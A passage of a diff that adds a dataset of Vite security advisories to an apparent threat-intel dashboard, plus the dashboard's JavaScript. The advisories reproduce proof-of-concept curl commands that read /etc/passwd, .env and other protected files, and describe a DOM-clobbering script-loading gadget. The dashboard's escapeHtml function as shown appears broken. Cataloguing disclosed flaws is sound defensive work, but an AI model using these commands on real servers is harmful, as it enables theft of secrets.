Select a run to inspect full details.
+ The request url "/tmp/secret.txt" is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```\n\n", + "display_name": "Vite", + "system_id": "vite", + "category": "frameworks", + "severity": "low", + "cvss_score": 3.1, + "exploit_status": "unknown", + "published_at": "2024-09-17T18:44:12Z", + "updated_at": "2026-02-04T04:05:31.919291Z", + "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx", + "secondary_source_urls": [ + "https://nvd.nist.gov/vuln/detail/CVE-2024-45811", + "https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249", + "https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34", + "https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd", + "https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6", + "https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7", + "https://github.com/vitejs/vite" + ], + "aliases": [ + "CVE-2024-45811", + "GHSA-9cwx-2883-4wfx" + ], + "secure_code_topics": [ + "dependency-upgrade-policy", + "file-upload-validation", + "proxy-trust-boundary" + ], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "artifact_mode": "synthetic", + "blocked_reason": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + } + }, + "vite--CVE-2024-45812": { + "canonical_id": "vite--CVE-2024-45812", + "title": "Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS", + "summary": "### Summary\n\nWe discovered a DOM Clobbering vulnerability in Vite when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.\n\nNote that, we have identified similar security issues in Webpack: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\n\n### Details\n\n**Backgrounds**\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n**Gadgets found in Vite**\n\nWe have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to `cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths starting with `__VITE_ASSET__` using the URL retrieved from `document.currentScript`.\n\nHowever, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.\n\n```\nconst relativeUrlMechanisms = {\n amd: (relativePath) => {\n if (relativePath[0] !== \".\") relativePath = \"./\" + relativePath;\n return getResolveUrl(\n `require.toUrl('${escapeId(relativePath)}'), document.baseURI`\n );\n },\n cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(\n relativePath\n )} : ${getRelativeUrlFromDocument(relativePath)})`,\n es: (relativePath) => getResolveUrl(\n `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`\n ),\n iife: (relativePath) => getRelativeUrlFromDocument(relativePath),\n // NOTE: make sure rollup generate `module` params\n system: (relativePath) => getResolveUrl(\n `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`\n ),\n umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(\n relativePath\n )} : ${getRelativeUrlFromDocument(relativePath, true)})`\n};\n```\n\n### PoC\n\nConsidering a website that contains the following `main.js` script, the devloper decides to use the Vite to bundle up the program with the following configuration. \n\n```\n// main.js\nimport extraURL from './extra.js?url'\nvar s = document.createElement('script')\ns.src = extraURL\ndocument.head.append(s)\n```\n\n```\n// extra.js\nexport default \"https://myserver/justAnOther.js\"\n```\n\n```\n// vite.config.js\nimport { defineConfig } from 'vite'\n\nexport default defineConfig({\n build: {\n assetsInlineLimit: 0, // To avoid inline assets for PoC\n rollupOptions: {\n output: {\n format: \"cjs\"\n },\n },\n },\n base: \"./\",\n});\n```\n\nAfter running the build command, the developer will get following bundle as the output.\n\n```\n// dist/index-DDmIg9VD.js\n\"use strict\";const t=\"\"+(typeof document>\"u\"?require(\"url\").pathToFileURL(__dirname+\"/extra-BLVEx9Lb.js\").href:new URL(\"extra-BLVEx9Lb.js\",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement(\"script\");e.src=t;document.head.append(e);\n```\n\nAdding the Vite bundled script, `dist/index-DDmIg9VD.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n\n```\n\n\n
\nThe request url "/tmp/secret.txt" is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw??\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```",
+ "display_name": "Vite",
+ "system_id": "vite",
+ "category": "frameworks",
+ "severity": "low",
+ "cvss_score": 3.1,
+ "exploit_status": "unknown",
+ "published_at": "2025-03-25T14:00:02Z",
+ "updated_at": "2026-02-04T03:13:24.371631Z",
+ "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w",
+ "secondary_source_urls": [
+ "https://nvd.nist.gov/vuln/detail/CVE-2025-30208",
+ "https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4",
+ "https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c",
+ "https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41",
+ "https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca",
+ "https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1",
+ "https://github.com/vitejs/vite"
+ ],
+ "aliases": [
+ "CVE-2025-30208",
+ "GHSA-x574-m823-4x7w"
+ ],
+ "secure_code_topics": [
+ "dependency-upgrade-policy",
+ "file-upload-validation",
+ "proxy-trust-boundary"
+ ],
+ "verification_status": "triage-manual",
+ "verification_mode": "synthetic",
+ "artifact_mode": "synthetic",
+ "blocked_reason": null,
+ "browser_evidence": {
+ "required": false,
+ "present": false,
+ "refs": []
+ }
+ },
+ "vite--CVE-2025-31125": {
+ "canonical_id": "vite--CVE-2025-31125",
+ "title": "Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query",
+ "summary": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n- base64 encoded content of non-allowed files is exposed using `?inline&import` (originally reported as `?import&?inline=1.wasm?init`)\n- content of non-allowed files is exposed using `?raw?import`\n\n`/@fs/` isn't needed to reproduce the issue for files inside the project root.\n\n### PoC\n\nOriginal report (check details above for simplified cases):\n\nThe ?import&?inline=1.wasm?init ending allows attackers to read arbitrary files and returns the file content if it exists. Base64 decoding needs to be performed twice\n```\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n```\n\nExample full URL `http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init`",
+ "display_name": "Vite",
+ "system_id": "vite",
+ "category": "frameworks",
+ "severity": "low",
+ "cvss_score": 3.1,
+ "exploit_status": "unknown",
+ "published_at": "2025-03-31T17:31:54Z",
+ "updated_at": "2026-02-04T04:37:24.129476Z",
+ "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-4r4m-qw57-chr8",
+ "secondary_source_urls": [
+ "https://nvd.nist.gov/vuln/detail/CVE-2025-31125",
+ "https://github.com/vitejs/vite/commit/59673137c45ac2bcfad1170d954347c1a17ab949",
+ "https://github.com/vitejs/vite",
+ "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31125"
+ ],
+ "aliases": [
+ "CVE-2025-31125",
+ "GHSA-4r4m-qw57-chr8"
+ ],
+ "secure_code_topics": [
+ "dependency-upgrade-policy",
+ "file-upload-validation",
+ "proxy-trust-boundary"
+ ],
+ "verification_status": "triage-manual",
+ "verification_mode": "synthetic",
+ "artifact_mode": "synthetic",
+ "blocked_reason": null,
+ "browser_evidence": {
+ "required": false,
+ "present": false,
+ "refs": []
+ }
+ },
+ "vite--CVE-2025-31486": {
+ "canonical_id": "vite--CVE-2025-31486",
+ "title": "Vite allows server.fs.deny to be bypassed with .svg or relative paths",
+ "summary": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n#### `.svg`\n\nRequests ending with `.svg` are loaded at this line.\nhttps://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290\nBy adding `?.svg` with `?.wasm?init` or with `sec-fetch-dest: script` header, the restriction was able to bypass.\n\nThis bypass is only possible if the file is smaller than [`build.assetsInlineLimit`](https://vite.dev/config/build-options.html#build-assetsinlinelimit) (default: 4kB) and when using Vite 6.0+.\n\n#### relative paths\n\nThe check was applied before the id normalization. This allowed requests to bypass with relative paths (e.g. `../../`).\n\n### PoC\n\n```bash\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\n\nsend request to read `etc/passwd`\n\n```bash\ncurl 'http://127.0.0.1:5173/etc/passwd?.svg?.wasm?init'\n```\n\n```bash\ncurl 'http://127.0.0.1:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'\n```",
+ "display_name": "Vite",
+ "system_id": "vite",
+ "category": "frameworks",
+ "severity": "low",
+ "cvss_score": 3.1,
+ "exploit_status": "unknown",
+ "published_at": "2025-04-04T14:20:05Z",
+ "updated_at": "2026-02-04T03:51:38.412061Z",
+ "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x",
+ "secondary_source_urls": [
+ "https://nvd.nist.gov/vuln/detail/CVE-2025-31486",
+ "https://github.com/vitejs/vite/commit/62d7e81ee189d65899bb65f3263ddbd85247b647",
+ "https://github.com/vitejs/vite",
+ "https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290"
+ ],
+ "aliases": [
+ "CVE-2025-31486",
+ "GHSA-xcj6-pq6g-qj4x"
+ ],
+ "secure_code_topics": [
+ "dependency-upgrade-policy",
+ "file-upload-validation",
+ "proxy-trust-boundary",
+ "plugin-extension-trust-policy"
+ ],
+ "verification_status": "triage-manual",
+ "verification_mode": "synthetic",
+ "artifact_mode": "synthetic",
+ "blocked_reason": null,
+ "browser_evidence": {
+ "required": false,
+ "present": false,
+ "refs": []
+ }
+ },
+ "vite--CVE-2025-32395": {
+ "canonical_id": "vite--CVE-2025-32395",
+ "title": "Vite has an `server.fs.deny` bypass with an invalid `request-target`",
+ "summary": "### Summary\nThe contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun.\n\n### Impact\nOnly apps with the following conditions are affected.\n\n- explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the Vite dev server on runtimes that are not Deno (e.g. Node, Bun)\n\n### Details\n\n[HTTP 1.1 spec (RFC 9112) does not allow `#` in `request-target`](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2). Although an attacker can send such a request. For those requests with an invalid `request-line` (it includes `request-target`), the spec [recommends to reject them with 400 or 301](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2-4). The same can be said for HTTP 2 ([ref1](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-2.4.1), [ref2](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-3), [ref3](https://datatracker.ietf.org/doc/html/rfc9113#section-8.1.1-3)).\n\nOn Node and Bun, those requests are not rejected internally and is passed to the user land. For those requests, the value of [`http.IncomingMessage.url`](https://nodejs.org/docs/latest-v22.x/api/http.html#messageurl) contains `#`. Vite assumed `req.url` won't contain `#` when checking `server.fs.deny`, allowing those kinds of requests to bypass the check.\n\nOn Deno, those requests are not rejected internally and is passed to the user land as well. But for those requests, the value of `http.IncomingMessage.url` did not contain `#`. \n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\nsend request to read `/etc/passwd`\n```\ncurl --request-target /@fs/Users/doggy/Desktop/vite-project/#/../../../../../etc/passwd http://127.0.0.1:5173\n```",
+ "display_name": "Vite",
+ "system_id": "vite",
+ "category": "frameworks",
+ "severity": "medium",
+ "cvss_score": 4.0,
+ "exploit_status": "unknown",
+ "published_at": "2025-04-11T14:06:03Z",
+ "updated_at": "2026-02-04T04:11:44.900383Z",
+ "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4",
+ "secondary_source_urls": [
+ "https://nvd.nist.gov/vuln/detail/CVE-2025-32395",
+ "https://github.com/vitejs/vite/commit/175a83909f02d3b554452a7bd02b9f340cdfef70",
+ "https://github.com/vitejs/vite"
+ ],
+ "aliases": [
+ "CVE-2025-32395",
+ "GHSA-356w-63v5-8wf4"
+ ],
+ "secure_code_topics": [
+ "dependency-upgrade-policy",
+ "file-upload-validation",
+ "proxy-trust-boundary"
+ ],
+ "verification_status": "triage-manual",
+ "verification_mode": "synthetic",
+ "artifact_mode": "synthetic",
+ "blocked_reason": null,
+ "browser_evidence": {
+ "required": false,
+ "present": false,
+ "refs": []
+ }
+ },
+ "vite--CVE-2025-46565": {
+ "canonical_id": "vite--CVE-2025-46565",
+ "title": "Vite's server.fs.deny bypassed with /. for files under project root",
+ "summary": "### Summary\nThe contents of files in [the project `root`](https://vite.dev/config/shared-options.html#root) that are denied by a file matching pattern can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\nOnly files that are under [project `root`](https://vite.dev/config/shared-options.html#root) and are denied by a file matching pattern can be bypassed.\n\n- Examples of file matching patterns: `.env`, `.env.*`, `*.{crt,pem}`, `**/.env`\n- Examples of other patterns: `**/.git/**`, `.git/**`, `.git/**/*`\n\n### Details\n[`server.fs.deny`](https://vite.dev/config/server-options.html#server-fs-deny) can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns).\nThese patterns were able to bypass for files under `root` by using a combination of slash and dot (`/.`).\n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env/. http://localhost:5173\n```\n\n\n",
+ "display_name": "Vite",
+ "system_id": "vite",
+ "category": "frameworks",
+ "severity": "medium",
+ "cvss_score": 4.0,
+ "exploit_status": "unknown",
+ "published_at": "2025-04-30T17:40:27Z",
+ "updated_at": "2026-02-04T03:27:17.681639Z",
+ "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3",
+ "secondary_source_urls": [
+ "https://nvd.nist.gov/vuln/detail/CVE-2025-46565",
+ "https://github.com/vitejs/vite/commit/c22c43de612eebb6c182dd67850c24e4fab8cacb",
+ "https://github.com/vitejs/vite"
+ ],
+ "aliases": [
+ "CVE-2025-46565",
+ "GHSA-859w-5945-r5v3"
+ ],
+ "secure_code_topics": [
+ "dependency-upgrade-policy",
+ "file-upload-validation",
+ "proxy-trust-boundary"
+ ],
+ "verification_status": "triage-manual",
+ "verification_mode": "synthetic",
+ "artifact_mode": "synthetic",
+ "blocked_reason": null,
+ "browser_evidence": {
+ "required": false,
+ "present": false,
+ "refs": []
+ }
+ },
+ "vite--CVE-2025-58751": {
+ "canonical_id": "vite--CVE-2025-58751",
+ "title": "Vite middleware may serve files starting with the same name with the public directory",
+ "summary": "### Summary\nFiles starting with the same name with the public directory were served bypassing the `server.fs` settings.\n\n### Impact\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- uses [the public directory feature](https://vite.dev/guide/assets.html#the-public-directory) (enabled by default)\n- a symlink exists in the public directory\n\n### Details\nThe [servePublicMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L79) function is in charge of serving public files from the server. It returns the [viteServePublicMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L106) function which runs the needed tests and serves the page. The viteServePublicMiddleware function [checks if the publicFiles variable is defined](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L111), and then uses it to determine if the requested page is public. In the case that the publicFiles is undefined, the code will treat the requested page as a public page, and go on with the serving function. [publicFiles may be undefined if there is a symbolic link anywhere inside the public directory](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/publicDir.ts#L21). In that case, every requested page will be passed to the public serving function. The serving function is based on the [sirv](https://github.com/lukeed/sirv) library. Vite patches the library to add the possibility to test loading access to pages, but when the public page middleware [disables this functionality](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L89) since public pages are meant to be available always, regardless of whether they are in the allow or deny list.\n\nIn the case of public pages, the serving function is [provided with the path to the public directory](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L85) as a root directory. The code of the sirv library [uses the join function to get the full path to the requested file](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L42). For example, if the public directory is \"/www/public\", and the requested file is \"myfile\", the code will join them to the string \"/www/public/myfile\". The code will then pass this string to the normalize function. Afterwards, the code will [use the string's startsWith function](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L43) to determine whether the created path is within the given directory or not. Only if it is, it will be served.\n\nSince [sirv trims the trailing slash of the public directory](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L119), the string's startsWith function may return true even if the created path is not within the public directory. For example, if the server's root is at \"/www\", and the public directory is at \"/www/p\", if the created path will be \"/www/private.txt\", the startsWith function will still return true, because the string \"/www/private.txt\" starts with\u00a0 \"/www/p\". To achieve this, the attacker will use \"..\" to ask for the file \"../private.txt\". The code will then join it to the \"/www/p\" string, and will receive \"/www/p/../private.txt\". Then, the normalize function will return \"/www/private.txt\", which will then be passed to the startsWith function, which will return true, and the processing of the page will continue without checking the deny list (since this is the public directory middleware which doesn't check that).\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm create vite@latest\ncd vite-project/\nmkdir p\ncd p\nln -s a b\ncd ..\necho 'import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({publicDir: path.resolve(__dirname, \"p/\"), server: {fs: {deny: [path.resolve(__dirname, \"private.txt\")]}}})' > vite.config.js\necho \"secret\" > private.txt\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/private.txt'`\n\nYou will receive a 403 HTTP Response,\u00a0 because private.txt is denied.\n\nNow in the same shell run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/../private.txt'`\n\nYou will receive the contents of private.txt.\n\n### Related links\n- https://github.com/lukeed/sirv/commit/f0113f3f8266328d804ee808f763a3c11f8997eb",
+ "display_name": "Vite",
+ "system_id": "vite",
+ "category": "frameworks",
+ "severity": "medium",
+ "cvss_score": 4.0,
+ "exploit_status": "unknown",
+ "published_at": "2025-09-09T20:55:56Z",
+ "updated_at": "2026-02-04T04:33:22.508417Z",
+ "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-g4jq-h2w9-997c",
+ "secondary_source_urls": [
+ "https://nvd.nist.gov/vuln/detail/CVE-2025-58751",
+ "https://github.com/lukeed/sirv/commit/f0113f3f8266328d804ee808f763a3c11f8997eb",
+ "https://github.com/vitejs/vite/commit/09f2b52e8d5907f26602653caf41b3a56692600d",
+ "https://github.com/vitejs/vite/commit/4f1c35bcbb5830290c694aa14b6789e07450f069",
+ "https://github.com/vitejs/vite/commit/63e2a5d232218f3f8d852056751e609a5367aaec",
+ "https://github.com/vitejs/vite/commit/e11d24008b97d4ca731ecc1a3b95260a6d12e7e0",
+ "https://github.com/vitejs/vite"
+ ],
+ "aliases": [
+ "CVE-2025-58751",
+ "GHSA-g4jq-h2w9-997c"
+ ],
+ "secure_code_topics": [
+ "dependency-upgrade-policy",
+ "file-upload-validation",
+ "proxy-trust-boundary"
+ ],
+ "verification_status": "triage-manual",
+ "verification_mode": "synthetic",
+ "artifact_mode": "synthetic",
+ "blocked_reason": null,
+ "browser_evidence": {
+ "required": false,
+ "present": false,
+ "refs": []
+ }
+ },
+ "vite--CVE-2025-58752": {
+ "canonical_id": "vite--CVE-2025-58752",
+ "title": "Vite's `server.fs` settings were not applied to HTML files",
+ "summary": "### Summary\nAny HTML files on the machine were served regardless of the `server.fs` settings.\n\n### Impact\n\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- `appType: 'spa'` (default) or `appType: 'mpa'` is used\n\nThis vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.\n\n### Details\nThe [serveStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L123) function is in charge of serving static files from the server. It returns the [viteServeStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L136) function which runs the needed tests and serves the page. The viteServeStaticMiddleware function [checks if the extension of the requested file is \".html\"](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L144). If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case [htmlFallbackMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/htmlFallback.ts#L14), and then to [indexHtmlMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/indexHtml.ts#L438). These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client.\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm create vite@latest\ncd vite-project/\necho \"secret\" > /tmp/secret.html\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'`\n\nThe contents of /tmp/secret.html will be returned.\n\nThis will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell:\n\n```\necho 'import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, \"secret_files/*\")]}}})' > [vite.config.js](http://vite.config.js)\nmkdir secret_files\necho \"secret txt\" > secret_files/secret.txt\necho \"secret html\" > secret_files/secret.html\nnpm run dev\n\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'`\n\nYou will receive a 403 HTTP Response,\u00a0 because everything in the secret_files directory is denied.\n\nNow in the same shell run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'`\n\nYou will receive the contents of secret_files/secret.html.",
+ "display_name": "Vite",
+ "system_id": "vite",
+ "category": "frameworks",
+ "severity": "medium",
+ "cvss_score": 4.0,
+ "exploit_status": "unknown",
+ "published_at": "2025-09-09T20:54:42Z",
+ "updated_at": "2026-02-04T04:35:16.287471Z",
+ "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-jqfw-vq24-v9c3",
+ "secondary_source_urls": [
+ "https://nvd.nist.gov/vuln/detail/CVE-2025-58752",
+ "https://github.com/vitejs/vite/commit/0ab19ea9fcb66f544328f442cf6e70f7c0528d5f",
+ "https://github.com/vitejs/vite/commit/14015d794f69accba68798bd0e15135bc51c9c1e",
+ "https://github.com/vitejs/vite/commit/482000f57f56fe6ff2e905305100cfe03043ddea",
+ "https://github.com/vitejs/vite/commit/6f01ff4fe072bcfcd4e2a84811772b818cd51fe6",
+ "https://github.com/vitejs/vite",
+ "https://github.com/vitejs/vite/blob/v7.1.5/packages/vite/CHANGELOG.md"
+ ],
+ "aliases": [
+ "CVE-2025-58752",
+ "GHSA-jqfw-vq24-v9c3"
+ ],
+ "secure_code_topics": [
+ "dependency-upgrade-policy",
+ "file-upload-validation",
+ "proxy-trust-boundary",
+ "plugin-extension-trust-policy"
+ ],
+ "verification_status": "triage-manual",
+ "verification_mode": "synthetic",
+ "artifact_mode": "synthetic",
+ "blocked_reason": null,
+ "browser_evidence": {
+ "required": false,
+ "present": false,
+ "refs": []
+ }
+ },
+ "vite--CVE-2025-62522": {
+ "canonical_id": "vite--CVE-2025-62522",
+ "title": "vite allows server.fs.deny bypass via backslash on Windows",
+ "summary": "### Summary\nFiles denied by [`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with `\\` when the dev server is running on Windows.\n\n### Impact\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the dev server on Windows\n\n### Details\n`server.fs.deny` can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These patterns were able to bypass by using a back slash(`\\`). The root cause is that `fs.readFile('/foo.png/')` loads `/foo.png`.\n\n### PoC\n```shell\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env\\ http://localhost:5173\n```\n",
+ "display_name": "Vite",
+ "system_id": "vite",
+ "category": "frameworks",
+ "severity": "medium",
+ "cvss_score": 4.0,
+ "exploit_status": "unknown",
+ "published_at": "2025-10-20T19:54:28Z",
+ "updated_at": "2026-02-04T04:13:38.886554Z",
+ "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7",
+ "secondary_source_urls": [
+ "https://nvd.nist.gov/vuln/detail/CVE-2025-62522",
+ "https://github.com/vitejs/vite/commit/f479cc57c425ed41ceb434fecebd63931b1ed4ed",
+ "https://github.com/vitejs/vite"
+ ],
+ "aliases": [
+ "CVE-2025-62522",
+ "GHSA-93m4-6634-74q7"
+ ],
+ "secure_code_topics": [
+ "dependency-upgrade-policy",
+ "file-upload-validation",
+ "proxy-trust-boundary"
+ ],
+ "verification_status": "triage-manual",
+ "verification_mode": "synthetic",
+ "artifact_mode": "synthetic",
+ "blocked_reason": null,
+ "browser_evidence": {
+ "required": false,
+ "present": false,
+ "refs": []
+ }
+ }
+}
diff --git a/08-threat-intel/generated/dashboard/assets/app.js b/08-threat-intel/generated/dashboard/assets/app.js
new file mode 100644
index 00000000..d7ec6b0e
--- /dev/null
+++ b/08-threat-intel/generated/dashboard/assets/app.js
@@ -0,0 +1,507 @@
+
+const state = {
+ summary: null,
+ runs: [],
+ systems: [],
+ advisories: {},
+ profiles: {},
+ selectedRunId: null,
+ selectedArtifact: null,
+ filters: { search: "", system: "", status: "", family: "" },
+ autoRefresh: true,
+ refreshMs: 5000,
+ refreshHandle: null,
+};
+
+const $ = (id) => document.getElementById(id);
+const statusClass = (status) => `status-pill ${({
+ "blocked-artifact": "status-blocked-artifact",
+ "blocked-destructive": "status-blocked-destructive",
+ "triage-manual": "status-triage-manual",
+ "verified-real": "status-verified-real",
+ "verified-synthetic": "status-verified-synthetic",
+ "suspected": "status-suspected",
+ "completed": "status-verified-real",
+ "failed": "status-blocked-artifact",
+ "skipped": "status-triage-manual"
+})[status] || "status-default"}`;
+
+function escapeHtml(value) {
+ return String(value ?? "")
+ .replaceAll("&", "&")
+ .replaceAll("<", "<")
+ .replaceAll(">", ">")
+ .replaceAll('"', """);
+}
+
+function timeAgo(value) {
+ if (!value) return "-";
+ const diff = Date.now() - new Date(value).getTime();
+ if (Number.isNaN(diff)) return value;
+ const seconds = Math.floor(diff / 1000);
+ if (seconds < 60) return `${seconds}s ago`;
+ const minutes = Math.floor(seconds / 60);
+ if (minutes < 60) return `${minutes}m ago`;
+ const hours = Math.floor(minutes / 60);
+ if (hours < 24) return `${hours}h ago`;
+ const days = Math.floor(hours / 24);
+ return `${days}d ago`;
+}
+
+async function fetchJson(url) {
+ const response = await fetch(`${url}?t=${Date.now()}`, { cache: "no-store" });
